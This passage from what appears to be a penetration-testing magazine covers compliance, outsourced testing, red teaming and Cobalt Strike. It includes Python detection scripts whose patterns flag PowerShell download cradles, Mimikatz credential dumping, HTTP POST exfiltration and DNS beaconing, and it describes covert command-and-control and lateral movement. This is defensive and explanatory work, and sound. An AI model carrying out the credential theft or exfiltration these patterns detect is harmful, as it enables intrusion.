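    # One admin reaching one box's C$ is routine; a department share is not an admin share.
    {"ts": "2015-11-02T10:01:00", "id": 5140, "host": "FS01", "user": "ACME\\alice", "share": "\\\\*\\C$"},
    {"ts": "2015-11-02T10:01:05", "id": 5140, "host": "FS01", "user": "ACME\\alice", "share": "\\\\*\\Finance"},
    {"ts": "2015-11-02T10:00:30", "id": 4104, "host": "WS02", "user": "ACME\\bob", "script": CRADLE},
    {"ts": "2015-11-02T10:02:00", "id": 4104, "host": "WS09", "user": "ACME\\alice",
     "script": "Get-ChildItem C:\\Temp | Measure-Object"},
]

# Administrative shares end in C$ or ADMIN$ (the article tests C$).
ADMIN_SHARE = re.compile(r"\\(C|ADMIN)\$$", re.IGNORECASE)


def admin_share_sweeps(events, window=timedelta(minutes=5), min_hosts=5):
    """Return {user: distinct_host_count} for accounts that reached an
    administrative share on at least `min_hosts` different hosts inside any
    interval of length `window`.  Many hosts in seconds is the share
    enumeration pattern; a single host is normal administration."""
    per_user = defaultdict(list)
    for ev in events:
        if ev["id"] == 5140 and ADMIN_SHARE.search(ev["share"]):
            per_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev["host"]))
    alerts = {}
    for user, hits in per_user.items():
        hits.sort()
        best = 0
        for i, (start, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - start <= window}
            best = max(best, len(hosts))
        if best >= min_hosts:
            alerts[user] = best
    return alerts


# Indicators taken from the script the article shows.  The cradle rule needs
# both halves (IEX and DownloadString) so ordinary WebClient use is not flagged.
INDICATORS = {
    "download_cradle": re.compile(r"(IEX|Invoke-Expression)\b.*DownloadString\s*\(", re.I | re.S),
    "mimikatz": re.compile(r"Invoke-Mimikatz|-DumpCreds", re.I),
    "http_post_exfil": re.compile(r"Net\.WebRequest\]::Create\(.*Method\s*=\s*[\"']POST[\"']", re.I | re.S),
}


def suspicious_script_blocks(events):
    """Return one finding per 4104 event that matches any indicator:
    {"host", "user", "indicators": [names]}.  Two or more indicators in the
    same block is high confidence."""
    findings = []
    for ev in events:
        if ev["id"] != 4104:
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(ev["script"])]
        if matched:
            findings.append({"host": ev["host"], "user": ev["user"], "indicators": matched})
    return findings


if __name__ == "__main__":
    for user, n in admin_share_sweeps(SAMPLE_EVENTS).items():
        print(f"admin-share sweep: {user} reached {n} hosts inside the window")
    for f in suspicious_script_blocks(SAMPLE_EVENTS):
        print(f"script block on {f['host']} by {f['user']}: {', '.join(f['indicators'])}")
```

Both checks need the telemetry to exist first: 5140 requires object access auditing for file shares, and 4104 requires script block logging to be enabled; neither is on by default, which is part of why a tool like this is described as stealthy.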


Figure 9: CredCrack output

Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to escalate privileges in large enterprise environments and is just one example of the several powerful tools available for pentesters today.

CONCLUSION

There are several ways to escalate privileges on a network and the aforementioned tools are just a handful of them. The cyber security landscape is always changing and there is always something to be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from researching new methodologies and building the next best tool!

About the author: JONATHAN H. BROCHE

Computer security professional with over ten years of hands-on experience in the Information Technology field. He specializes in penetration testing, social engineering and system security configurations. Jonathan has a bachelor's degree in Information Technology from Florida International University with concentrations in application development and UNIX administration. Additionally, he has earned certifications from Offensive Security (OSCE, OSCP, OSWP) and the Global Information Assurance Council (GSEC).

Jonathan is also a researcher, writer and speaker. His latest contribution to the industry is the renowned CredCrack tool, which gained international attention upon its release. Jonathan is an active member of several security-related organizations such as local ISSA and OWASP chapters and frequently participates in capture the flag events. In his free time he enjoys mountain biking.


Security vs. compliance and the role of the penetration tester by Joshua Gold

In regulated industries, it has become common practice for management to assume that compliance and security are one and the same. They believe that because an auditor has marked them as being compliant, there are no further actions that need to be taken to secure their systems. The idea that because something is compliant, it must also be secure has become an inside joke among security professionals; unfortunately, those same professionals are often incapable of translating to management exactly why a compliant system is not necessarily secure.

INTRODUCTION

In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that “Utilities are focusing on regulatory compliance instead of comprehensive security” and that “security requirements are inherently incomplete, and having a culture that views the security problem as being solved once those requirements are met will leave an organization vulnerable to cyber-attack.” It is not only utilities that suffer from this problem; in the last 18 months, over 150 million credit card numbers and protected health records have been stolen from companies that had all been found compliant in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus (to name only a few) have learned just how short of true security a compliant program can leave you.


THE ROLE OF THE PENETRATION TESTER

Most experienced penetration testers know the feeling of arriving on site at a new client and having the security administrators almost beg to have their systems compromised. They are aware of how vulnerable they are, but have been unable to secure the budget to do anything about it. They believe that the only way to do so is for the penetration test report to show management exactly how secure their compliant system is. Oftentimes throughout the drafting of the report, the security administrators will request specific wording or recommendations that they believe will help them convince their management team that something more needs to be done.

However, it is also important for the penetration tester to be aware of and knowledgeable about the regulations with which their client must comply. It is no secret that many companies value third party input much more highly than they do internal recommendations. A request that has been made multiple times by a security team may suddenly be fulfilled if it comes as a recommendation in a third party report. As such, it is often the responsibility of the penetration tester to identify the areas where management has been lax in assigning resources and prioritize their recommendations accordingly. If it is clear that a large share of the security budget is being directed towards a brand new Security Incident and Event Manager (SIEM), but the security staff doesn’t have the knowledge or training to support that SIEM, it is important for the penetration tester to recognize this and recommend training for the security staff. Writing a report that recommends changes that fall far outside the scope of the client’s compliance needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the report can be aligned with the client’s compliance goals, it becomes far more likely that management and the security team will utilize it to achieve not only greater security, but also stronger compliance.


IF COMPLIANCE ≠ SECURITY, WHY BOTHER?

Many people question the necessity of regulations, as they do not necessarily engender true security. The thinking is that if companies are left to their own devices, they will develop a security posture commensurate with their risk. To a certain extent, this line of thinking has its merits. However, one can easily compare the security posture of the U.S. Electric Utilities (regulated by the NERC CIP Standards) to that of the U.S. Water Utilities (unregulated). Both are considered Critical Infrastructure, and both face the same sort of cyber threats. The NERC CIP standards have forced the electric industry to implement a minimum standard of security. Many utilities have taken the approach of “doing things right” as long as they have to do them for compliance. These utilities are using their compliance burden to drive budget into their security departments, and to secure upper management buy-in.

The water industry, on the other hand, is often described as “The Wild West” by security experts. The lack of any regulation has led to a huge spectrum of security postures. Some utilities are taking the threats they face seriously, and have state of the art defenses in place. Other utilities still have SCADA systems directly connectable via dial-up without any authentication in place. This is not from a lack of effort on the part of the security teams at these utilities; it is often a lack of motivation, and sometimes understanding, on the part of upper management.

It is clear that compliance does have an impact on the overall level of security that can be expected in an industry. Compliance has given the electric utilities the motivation and justification to fight for greater budgets. Security and compliance teams can take hard numbers to upper management to show that an expenditure of $100,000 can prevent a fine of $1,000,000. Security teams in the water industry that want to spend the same amount are often left with no compelling way to justify the expenditure in terms that management is likely to understand.

WHAT CAN BE DONE TO INCREASE SECURITY AND COMPLIANCE?

It is clear that compliance does have an impact on the overall level of security that can be expected in an industry. However, it is also clear that as the compliance burden grows, companies begin to shift their focus towards meeting compliance, rather than becoming truly secure. As an independent third party, it is important for the penetration tester to maintain an objective view of the overall security posture and the machinations that have brought it about. In the end, it is the goal of every penetration test to help the client become more secure. Often this is accomplished by demonstrating weaknesses in target systems and advising on mitigating the risk to those systems. In a regulated industry, those mitigation plans may need to align with the overall compliance goal while still reducing the overall vulnerability of the system. Through this alignment, the penetration tester provides the means for security teams to fight for and receive the funding and support that makes true security possible.

Perhaps the best way for penetration testers to accomplish this is to become an expert on the compliance burden faced by their clients. Penetration tests for the electric industry should be conducted by NERC CIP experts, penetration testers for the health industry should be HIPAA experts, and penetration testers for the retail industry should be PCI-DSS experts. A good NERC CIP pentester could certainly find plenty of vulnerabilities in a hospital’s systems, but their report would not be nearly as complete or compelling as one written by a HIPAA expert, to say nothing of a penetration tester who has no compliance knowledge at all. The ability to custom tailor report findings towards specific compliance burdens will allow penetration testers to better serve their clients and help increase the overall level of security from compliance-driven entities.

About the author: JOSHUA GOLD

Security Consultant with Network & Security Technologies, which provides consulting services primarily to the U.S. Electric Industry. Mr. Gold was awarded a B.S. degree in Cybersecurity from the University of Maryland system and maintains a number of industry certifications. He also volunteers his time with the National Emergency Management Teams (Region 2, Communications Division), where he actively assisted in the recovery of businesses in New York City after Hurricane Sandy in 2012.


What issues might occur in outsourcing to an SI by Jim Hart


Many large organizations use a system integrator (SI) to provide their IT infrastructure and associated services. There is also a growing trend to use multiple suppliers to deliver the holistic service that was once provided by a single SI. In either case, using SI(s) can significantly impact the efficacy of Penetration Testing unless the issues are recognized and managed early on by the organization being tested. Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals and for pre-determined in-scope systems. Other testing may occur ad hoc as required after significant changes to the environment. Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such as PCI.

How effective the penetration testing is may be highly dependent on the type of engagement the organization has with the SI – and not necessarily the SI itself. A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves all have the skills and capability to offer a highly effective all-round service delivering on the promises set out when a contract is negotiated. However, depending on the contract negotiated, the organization will receive different levels of service highly correlated to the value of the overall contract with the SI (basically, you get what you pay for). So, while at a high level and on paper the services provided in the bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes, do they really deliver what the organization needs? In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined scope, generally satisfying the terms of the contract but not necessarily satisfying the need to effectively secure the organization and to assure full compliance against any regulatory requirements.

Gaps only become apparent once the organization actually looks more deeply at the nature of the testing, how it was initiated and performed. It is important to regularly ask questions of the SI such as how deep was the testing and how was the scope validated? When you look at the small print of what was actually agreed, you may find the level of testing agreed to was actually only superficial and mostly automated scanning – hardly real penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the more subtle issues. Unless the organization employs specialists who examine or validate the level of testing, there may be an assumption that everything is fine as ‘penetration testing’ is completed regularly.

Scope is another important factor. The SI will typically be very good at keeping a complete and up to date list of all the assets being managed, as that is effectively their only way of accurately calculating the service costs, so it is in their interests to manage that list well. What the asset list does not do, however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe it is effective – as long as the organization has kept the SI informed of which applications or data sets may be considered as within a PCI scope. This is not always something that is as black and white as it should be, for not all organizations have cleanly defined network scopes or security zones. For those organizations where a PCI scope may bleed into other networks due to applications being connected to the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the annual testing.

The SI may continue to deliver per the contract and report all is well, and the organization may assume all of PCI is being regularly tested as the loss of synchronization of asset details goes unnoticed. It is not until there is a breach, or possibly worse still – the PCI auditor questions why some systems were missed out – that the organization becomes aware of this situation. The same scenario applies to ‘critical’ systems which contain confidential data, etc. The organization must ensure the scope the SI is working to is kept up to date so the right systems get tested, and it is not generally the responsibility of the SI to pro-actively obtain this information.

Regulatory requirements are also evolving and generally this tends towards stricter security controls, which can result in additional complexity. Introducing a requirement to perform authenticated testing, for example in PCI v3, creates a need to perform Penetration Testing in a very different way on some systems. For applications that require authentication, it can be very difficult to obtain credentials for the SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements around who can get access or how the access must be provided. If this is a new requirement with which the organization has never previously had to deal, especially outside of its pre-production testing networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this will take time. The contract between the organization and the SI may simply not accommodate this at all, but the time to find this out is not a few weeks before the regulatory audit is due!

When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and the service is not generally questioned. Service reporting is often all ‘green’, indicating all deliverables are on track; after all, that’s what you pay an SI for – to deliver the contracted service on time. You don’t generally get an independent attestation as to quality, or careful validation that it is meeting the real security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is incredibly important for the organization to either employ people with the necessary skills to validate the quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration Testing organization who can provide a baseline to identify service gaps.

If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize the actual deliverables, then the governance over the scope and quality of testing should never be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially PCI, may mean it’s time to renegotiate the contract with the SI and to seek a regular independent view to ensure they stay on track.

About the author: JIM HART

A seasoned Security Professional who has developed and honed his skills over the past 15 years in security. A consummate specialist who has successfully transformed from a highly skilled technical engineer, to Manager of a team of security analysts (UK and matrix-managed those in India), through consulting and then transitioning into a business development role delivering thought-leadership for major clients’ information security requirements within an Enterprise sales team of a Fortune 500 security software and service provider.


Pentesting a true art form by Martin Brough

Pentesting is truly an art form that I have studied for most of my life, however, pentesting is a dying art form that needs to be resuscitated! I don’t mean that people are no longer using them; in fact, it’s just the opposite. I have noticed that over the past five years, annual pentesting is working its way from being thought of as something you just do to meet (enter acronym here) compliance to standard IT security practice. Within the past two years, I have noticed a significant increase in companies adding annual pentests into their contracts with companies that handle their data. Companies that offer services such as SaaS, cloud data storage, outsourced web development and media management are now all being required by contract to participate in both annual audits of their systems and penetration tests to ensure their data is secure. So what do I mean by “Pentesting is a dying art form?” I mean that pentesting is a highly skilled practice and should be conducted by professionals who have been trained and know what they are looking for and how to test your company's systems. It seems that every script-kiddie with a Kali box these days will tell you they are a pentester!

A true pentest cannot be done from a box of automated tools. It involves a ton of research, analytics, scanning, probing, watching, social engineering, oh and yeah… exploitation! When I was growing up, if you wanted to learn to be a pentester or how to find vulnerabilities in software or hardware, you needed to be a member of small groups that did that as a hobby. Penetration testing used to be viewed as hacking, and hackers have always been close-knit groups that don’t share a lot unless you are vetted. Online video resources, like YouTube, I feel have changed that a lot. If you want to know what command to run in Nikto or Nmap, then just Google it and find a tutorial that some other teenager posted after watching another teenager do it. I am excited to see the direction that pentesting is taking as far as being accepted on a corporate level because it says to me that people are starting to care about their data and what it’s doing.


I think it’s really important to convey a few key points about penetration tests:

1. A pentest does not make your company un-hackable. The main objective of a well-done pentest is to reduce your attack surface. Your goal as a company should be to allow the specialized team conducting the pentest to treat your network as though they were a real attacker trying to get in. You want to find as many holes in your network as you can and close them.

2. Put as few restrictions on the pentesters as possible. A recent trend I have noticed in the past year has been companies that are contractually obligated to have these tests done but see them as a burden and dramatically limit the network exposure that the teams are allowed to have. This makes the results of your pentest borderline useless. One example I have seen of this is being told I can give them a report of my web application scans but under no circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the directions of traversal after gaining access but also tests any scanners, firewalls and loggers that are in place to see if they are configured to pick up on these kinds of events, so it is very important to allow the pentesters to run a full pentest against your defenses.

3. After all is said and done, your pentest is complete, your attack surface is reduced and you have your certificate in hand, spend the next 364 days maintaining the hard work you just put in. Patch your systems, check your logs, and always verify your code.

So what does all this mean for the future of pentesting? I believe that we will continue to see a massive increase in the requirement to have not only annual but semiannual pentests conducted, for high profile companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not just the compliance value but also the security value of having proper pentests conducted. Executives are able to see firsthand more and more in the news just how important it is to maintain a secure environment for your company’s data. Of course, with the increase in demand for pentesting, there in turn is an increase in those offering pentest services. Make sure you do your homework on who you sign to conduct your pentest. That person, whom you give access to your network, can do a lot of damage if they are guessing their way through! If you see your pentester sitting in your office watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can. There are plenty of reputable companies out there; you just need to find one that meets your company's needs as well as fits your company’s financial situation.

About the author: MARTIN BROUGH

Solutions-oriented IT Specialist with notable success directing a broad range of corporate IT initiatives while participating in planning and implementation of information-systems solutions in direct support of business objectives.


Think of security as a wheel and a never ending circle interview with Martin Voelk CEO of Cyber 51

MARTIN VOELK

Martin is an IT Security veteran with 18 years of experience in the IT industry. Prior to setting up CYBER 51 in 2009, Martin was already regularly teaching Penetration Testing Training Courses and Cisco authorized Security Courses, and was regularly engaged by governments and other businesses to establish Security policies and perform Ethical Hacking and Penetration Tests in order to secure network infrastructures and to remediate the threats encountered.


[PenTest Magazine]: Can you tell us something about yourself?

[Martin Voelk]: My name is Martin Voelk, I am 41 years old and have been in the IT Industry since 1997. I started out as a systems admin, and moved into networking where I achieved numerous certifications up to Cisco CCIE. As of 2005, I gained more interest in IT Security and started with penetration testing services as a contractor. Despite being more on the commercial side of things now, I hold a lot of current pentesting certifications such as the CEH, OSWP and OSCP as I am fascinated by auditing networks and infrastructures.

[PM]: What convinced you to establish your own company?

[MV]: Numerous factors played a role. I am an entrepreneur by heart and wanted to create my own company being able to focus on penetration testing. Financial reward was also one of the drivers and so was independency.

[PM]: Your firm provides services for companies from different sectors like card industry, healthcare, manufacturing or educational. Do you find more sectors become aware of cyber attacks?

[MV]: Security awareness has certainly reached board level. Many clients we have still don’t believe they could be targeted, but use our services regardless because they are bound to government and industry regulations such as PCI, HIPAA, ISO 27001 etc.


[PM]: What is the major difficulty in working with such different companies and sectors?

[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with customers. In some occasions, especially in larger companies, internal engineers become very defensive when being confronted with results. However, it’s not our aim to finger point. We merely uncover holes and help customers become more secure. On other occasions, the more we find, the more it is appreciated. Another big challenge is governmental work as it often requires very specific skills and certifications but the consultant holds a wrong passport. This can be very frustrating at times as, for example, only a UK citizen is allowed to perform the work for a UK government client.

[PM]: From your own experience, do you prefer to work with smaller or bigger companies?

[MV]: We prefer mid size to large size.

[PM]: I can see your company provides a great initiative: free educational sessions for children. Can you tell us more about this idea?

[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads, social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for kids.

[PM]: What are your general thoughts about development of the cyber security market?

[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social Engineering), Web Applications, Mobile Apps and Wireless.

[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any breakthrough changes in technology?

[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will become more sophisticated and need more testing and the mobile market brings its own new challenges in Wireless and Apps.

[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists? Do you find it's going to be harder to find a job in this area?

[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile, Colombia and Panama). We also engage in the UK market but very little in other countries. For us the biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and employers in the US actually often struggle to find the right skills available. The top 3 criteria:

- OSCP certified or better (OSCE etc.). The Offensive Security Certifications are the best ones in the market and we hire OSCPs over CEH, because the OSCP is a hands-on and very challenging exam. Someone who passed that exam is a real pentester who also can do reporting.
- Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the guys outside the US don’t come with great English language skills.
- Integrity, working to timelines and reliability.

[PM]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near future?

[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime and away from individual guys. Some of the attacks we have seen at customers require teams of highly skilled experts and tools, and a lot of the underworld has created and is creating task forces for certain jobs. A lot more challenging to tackle than the lone hacker or script kiddie.

[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in 2016?

[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also a lot of companies start realizing that technical defense isn’t everything and that social engineering makes up a lot of the breaches. User education and enforcement of policies will become a much bigger part.

[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice?

[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web App) is not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified Professional (OSCP) certification. It’s very well recognized in the industry and weeds out the theory from the hands on folks.


The sword and the shield by Tom Updegrove

I started to write this article about one of my favorite security tools, “Cobalt Strike”, but as I delved into the history and thinking behind Cobalt Strike I realized that a better story lies beneath the surface. The real story is about Pentesting and Adversarial Role Playing, which is thought to be the next stage of Digital Security. There’s a whole new breed of White Hat Hackers and they are called Threat Actors.

THE FUTURE OF DIGITAL DEFENSE

Penetration Testers tend to focus on gaining access and scream eureka when they get a shell. On the other hand, Threat Actors focus on post-exploitation, lateral movement, and persistence. Most Penetration Testers that I know say the test is over once they gain access to a system; whether that was by gaining access to a server room and dropping a zombie pineapple into the mix, or brute forcing a password and escalating privileges. On the other hand, Adversarial Role Playing involves a much longer engagement, and the behavior is more similar to a real Advanced Persistent Threat or APT. The focus is on how well the Network Defender can detect, mitigate and subdue the invader. According to Raphael Mudge (the developer of Armitage and Cobalt Strike), this is the future direction of Digital Defense.

ARMITAGE

On the Armitage home page it says: “Cyber Attack Management for Metasploit”, but Armitage is more than that. Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework. My first introduction to Metasploit was via the CLI, which was important to understand the framework. How well one understands the Exploits, Payloads, Meterpreter, Auxiliary components and scripts determines how well and effective the attack is. Seeing the same commands and getting feedback visually is so much more helpful. More like listening to a TV show on the radio than seeing it on a 4K flat screen in surround sound. Well, maybe not that extreme, but you get the idea.

COBALT STRIKE
Cobalt Strike is like a grown-up version of Armitage. According to its website, Cobalt Strike is for Adversary Simulation and Red Team Operations. Versions 1.0 and 2.0 utilized the Metasploit Framework and were among the first usable GUI front ends for Metasploit. An important component of Cobalt Strike is “Beacon”. “Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes” (Cobalt Strike website). Another aspect of Cobalt Strike is its social engineering features, which allow the Actor to get a foothold, plus covert command and control with Beacon, browser pivoting, and reporting, on top of Armitage's existing exploitation and team collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the Metasploit exploit and post-exploit capabilities. Beacon facilitates running PowerShell scripts over its connection (Python or Java, for example). There is even an email phishing module that reports when your recipients open the phishing email you sent them.
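From the defender's side, a DNS egress channel like the one described above leaves a recognizable pattern in resolver logs: many evenly spaced queries from one client to one zone, each with a random-looking leading label. The script below is an added example, not code from the article or from Cobalt Strike; it runs over constructed log lines and uses illustrative thresholds (MIN_QUERIES, MAX_INTERVAL_CV, MIN_LABEL_ENTROPY are assumptions chosen for this sample).

```python
import math
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample DNS log (not real traffic): "<ISO time> <client> <name>". The
# cdn-updates.test queries mimic a DNS egress channel: one query a minute, each
# with a random-looking first label that carries encoded data.
SAMPLE_LOG = """\
2015-11-03T09:00:00 10.0.0.12 www.example.org
2015-11-03T09:00:05 10.0.0.12 a1f9c3e7d2b4.cdn-updates.test
2015-11-03T09:01:05 10.0.0.12 7bd0e4a19c56.cdn-updates.test
2015-11-03T09:02:05 10.0.0.12 e83d0f2b7a91.cdn-updates.test
2015-11-03T09:03:05 10.0.0.12 4c9a1e7fd023.cdn-updates.test
2015-11-03T09:04:05 10.0.0.12 b2e6d81c0f47.cdn-updates.test
2015-11-03T09:04:30 10.0.0.12 www.example.org
"""

MIN_QUERIES = 5          # fewer queries than this cannot establish periodicity (assumed)
MAX_INTERVAL_CV = 0.5    # pstdev/mean of gaps between queries; low means regular (assumed)
MIN_LABEL_ENTROPY = 3.0  # bits per char; encoded data looks random, hostnames do not (assumed)

def shannon_entropy(label):
    """Shannon entropy (bits per character) of one DNS label; 0.0 for empty."""
    probs = [label.count(c) / len(label) for c in set(label)]
    return -sum(p * math.log2(p) for p in probs)

def parse_log(text):
    """Group (timestamp, first label) by (client, zone), zone = last two labels."""
    groups = defaultdict(list)
    for line in text.splitlines():
        ts, client, name = line.split()
        labels = name.rstrip(".").split(".")
        first = labels[0] if len(labels) > 2 else ""
        groups[(client, ".".join(labels[-2:]))].append((datetime.fromisoformat(ts), first))
    return groups

def find_dns_beacons(text):
    """Return (client, zone) pairs whose queries look like a DNS egress channel."""
    flagged = []
    for key, events in parse_log(text).items():
        if len(events) < MIN_QUERIES:
            continue
        events.sort()  # log lines may not be in time order
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap else 1.0
        entropy = statistics.mean(shannon_entropy(first) for _, first in events)
        if cv <= MAX_INTERVAL_CV and entropy >= MIN_LABEL_ENTROPY:
            flagged.append(key)
    return flagged
```

Real Beacon traffic adds jitter to its sleep interval, so in practice the interval threshold is a tuning knob rather than a fixed constant.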

COBALT STRIKE 3.0
As of October 2015, Cobalt Strike 3.0 does not share code with Armitage or depend on the Metasploit Framework. It is the first version of Cobalt Strike not to depend on the Metasploit Framework. The tool is geared towards red team operations and adversary simulation services. Although it does not depend on the Metasploit Framework, you can still run Metasploit elements. Through one Metasploit instance, your team will:
• Use the same sessions
• Share hosts, captured data, and downloaded files
• Communicate through a shared event log
• Run bots to automate red team tasks
Since October 2015, Cobalt Strike 3.0 has been available via the website. You can download a trial version at https://www.cobaltstrike.com/trial. You can also download its sibling (Armitage) free of charge at http://www.fastandeasyhacking.com/download

RED TEAMS
According to Wikipedia, “A red team is an independent group that challenges an organization to improve its effectiveness. The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine or publications about Red Teaming in the military exist.[1]”
[1] LtCol Brendan S. Mulvaney, "Strengthened Through the Challenge" (PDF), Marine Corps Gazette, July 2012.


PENETRATION TESTERS AND RED TEAMS
Penetration testers assess organization security, often unbeknownst to the client's staff (only management would be aware of the assessment). This type of Red Team provides a more realistic picture of security readiness than exercises, role playing, or announced assessments. The Red Team may trigger active controls and countermeasures within a given operational environment. Red Team Operations:
- Full Scope Penetration Tests
- Long-term Operations
- War Games
- Threat Scenarios / Cyber Security Exercises / Attack Simulations

THREAT ACTORS
Once a threat actor gains access to the network, they maintain communication with the compromised computer system. Threat actors gain more privileges by getting login credentials from the network that give access to valuable information. They also gather information (e.g. documents found on desktops, network access to shared drives, etc.) via regular user accounts. Once identified, the data is made ready for exfiltration.

GAINING PERSISTENCE ACROSS THE NETWORK
Lateral movement usually involves activities related to reconnaissance, credential stealing, and infiltrating other computers. When communication between the compromised systems and C&C (command and control) servers has been established, threat actors sustain persistent access across the network. They move laterally within the network and gain higher privileges through the use of different tools. This in turn enables threat actors to access servers which contain valuable information, the company's “crown jewels.” Apart from servers, threat actors are also interested in endpoint systems. For instance, confidential documents such as Microsoft Word, Microsoft Excel and Microsoft PowerPoint files are stored on personal computers.


As threat actors move deeper into the network, their movements and methods become difficult to detect, especially when they utilize Windows features and tools typically used by IT administrators. Gaining administrative privileges also makes threat actors’ activities hard to detect, or even untraceable.

REMEDIATION
In the past few years, there have been a number of great industry reports written and statistics shared on data breaches and investigations. Many of them focus on investigative findings and detection trends. There has been less focus, however, on what is arguably the most transformative component of an adversarial engagement: the successful remediation and the maturation of an organization’s ability to detect and respond to attacks moving forward. How do attackers respond to remediation actions, and what distinguishes successful organizations from those that were less successful? A few points to consider:
- The average time for attackers to conduct reinfection attempts after an organization completes initial remediation
- The percentage of organizations impacted by more than one attack group at a time
- The percentage of organizations that detect attacks internally versus those that are notified by third parties
- The factors that influence effective and efficient investigation and remediation
- Why some organizations remediate successfully and efficiently, and why others struggle

THE TOOLS
The tool needs for Adversary Simulations are far different. A unique covert channel matters far more than an unpatched exploit. A common element of Adversary Simulations is a white box assumed breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain compromise. The goal of the operator is to use this access to achieve effects and steal data in ways that help exercise and prepare the security operations staff for what they’re really up against. Remember too, that the threat actor in a production environment may also be an employee of the company, acting inside the corporate network.

ADVERSARY SIMULATION TRAINING
The tools for Adversary Simulation are coming. The tools alone are not the full package, however. Adversary Simulations require more than good tools; they require good technicians.

TRADECRAFT
Raphael Mudge uses the term “Tradecraft” to describe the mindset for Adversary Simulations. He says that they “require an appreciation for the efficacy that simply isn’t there in the penetration testing community yet”. Tradecraft is the best practice of a modern Adversary. What is the adversary’s playbook? What checklists do they follow? Why do they do the things they do? These are the questions that need to be asked by a corporation's security defenders.

THE BEST DEFENSE IS A GOOD OFFENCE
Both Armitage and Cobalt Strike pack enough offensive capability to take down a network abruptly as well as to act as a long-term data exfiltrator. Penetration Testers will get the most benefit from the current version of Armitage due to its use of the Metasploit Framework and ready-made exploits. Threat Actors will get the most benefit from Cobalt Strike 3.0 due to its “Beacons” and “Social Engineering” tool set. Whichever tool you use, wield it like a sword so the network defenders can develop their defensive skills.

About the author: TOM UPDEGROVE
ITC expert in the Philadelphia/DC Metro area. He is CEO of Philadelphia-based “Internetwork Service & Security”, where he manages a number of business networks and provides advice on network design, work flow, performance optimization and security. He is also an EC-Council certified trainer and conducts classes in Ethical Hacking in the Washington DC area. Tom has recently been featured in a video series, along with partner Larry Greenblatt, in the program they created, “Cyber Kung Fu”. This has been released on Secure Ninja TV and it shows all of the concepts and tools that the pros use for Pen Testing: https://www.youtube.com/watch?v=8R3QjNXDaVA. He has also presented security lectures at Hacker Halted and Sharkfest in 2014.



Impact of compliance on information security
by Ayo Tayo Balogun

"Target was certified as meeting the standard for the payment card industry in September 2013. Nonetheless, we suffered a data breach." Target Chairman, President, and Chief Executive Officer Gregg Steinhafel

